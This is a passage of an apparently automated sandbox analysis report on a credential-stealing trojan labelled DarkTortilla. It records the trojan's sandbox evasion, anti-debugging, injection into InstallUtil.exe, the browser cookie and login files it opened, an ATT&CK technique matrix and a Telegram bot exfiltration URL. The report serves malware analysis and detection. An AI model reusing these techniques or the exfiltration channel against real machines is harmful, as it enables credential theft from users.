                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe TID: 4348  Thread sleep time: -91000s >= -30000s
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe TID: 7432  Thread sleep time: -26747778906878833s >= -30000s
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe TID: 7608  Thread sleep time: -64000s >= -30000s
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe TID: 7128  Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep count: 33 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -30437127721620741s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -599891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7776  Thread sleep count: 8432 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep count: 36 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7776  Thread sleep count: 1386 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -599766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -599656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -599547s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -599438s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -599313s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -599188s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -599078s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -598957s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -598829s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -598704s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -598579s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -598454s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -598329s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -598204s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -598079s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -597954s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -597829s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -597704s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -597579s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -597454s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -597329s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -597204s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -597079s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -596954s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -596829s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -596704s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -596579s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -596454s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -596329s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -596204s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -596079s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -595954s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -595829s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -595704s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -595579s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -595454s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -595329s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -595204s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -595078s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -594969s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -594844s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -594735s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -594610s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -594485s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -594360s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -594235s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -594110s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772  Thread sleep time: -593985s >= -30000s
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1806875709.0000000005070000.00000004.08000000.00040000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003D18000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: VBoxTray
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: outlook.office.comVMware20,11696492231s
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: AMC password management pageVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: interactivebrokers.comVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                    Source: InstallUtil.exe, 0000000A.00000002.2526451432.0000000001027000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: outlook.office365.comVMware20,11696492231t
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003D18000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: 234343455GSOFTWARE\VMware, Inc.\VMware VGAuth
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: discord.comVMware20,11696492231f
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: global block list test formVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: dev.azure.comVMware20,11696492231j
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: bankofamerica.comVMware20,11696492231x
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: tasks.office.comVMware20,11696492231o
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: ms.portal.azure.comVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Code function: 1_2_0500BC6C CheckRemoteDebuggerPresent,1_2_0500BC6C
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Process queried: DebugPort
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Process queried: DebugPort
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B43008
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Queries volume information: C:\Users\user\Desktop\sS7Jrsk0Z7.exe VolumeInformation
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: sS7Jrsk0Z7.exe PID: 6676, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 7612, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                    Remote Access Functionality

                    Source: Yara match | File source: 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: sS7Jrsk0Z7.exe PID: 6676, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 7612, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Valid Accounts
                    Windows Management Instrumentation1
                    Valid Accounts
                    1
                    Valid Accounts
                    1
                    Masquerading
                    1
                    OS Credential Dumping
                    111
                    Security Software Discovery
                    Remote Services1
                    Email Collection
                    1
                    Web Service
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading
                    1
                    Access Token Manipulation
                    1
                    Valid Accounts
                    LSASS Memory1
                    Process Discovery
                    Remote Desktop Protocol1
                    Archive Collected Data
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
                    Process Injection
                    1
                    Access Token Manipulation
                    Security Account Manager141
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin Shares1
                    Data from Local System
                    3
                    Ingress Tool Transfer
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
                    Virtualization/Sandbox Evasion
                    LSA Secrets1
                    System Network Configuration Discovery
                    SSHKeylogging14
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
                    Process Injection
                    Cached Domain Credentials13
                    System Information Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Hidden Files and Directories
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                    Obfuscated Files or Information
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    DLL Side-Loading
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Source | Detection | Scanner | Label
                    sS7Jrsk0Z7.exe | 75% | ReversingLabs | Win32.Trojan.DarkTortilla
                    sS7Jrsk0Z7.exe | 65% | Virustotal |
                    sS7Jrsk0Z7.exe | 100% | Joe Sandbox ML |
                    No Antivirus matches
                    Name | IP | Active | Malicious | Reputation
                    reallyfreegeoip.org | 104.21.64.1 | true | false | high
                    api.telegram.org | 149.154.167.220 | true | false | high
                    checkip.dyndns.com | 158.101.44.242 | true | false | high
                    checkip.dyndns.org | unknown | unknown | false | high
                    Name | Malicious | Reputation
                    https://reallyfreegeoip.org/xml/8.46.123.189 | false | high
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2012/01/2025%20/%2019:38:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | high
                    http://checkip.dyndns.org/ | false | high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/InstallUtil.exe, 0000000A.00000002.2528573106.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/chrome_newtabInstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.orgInstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
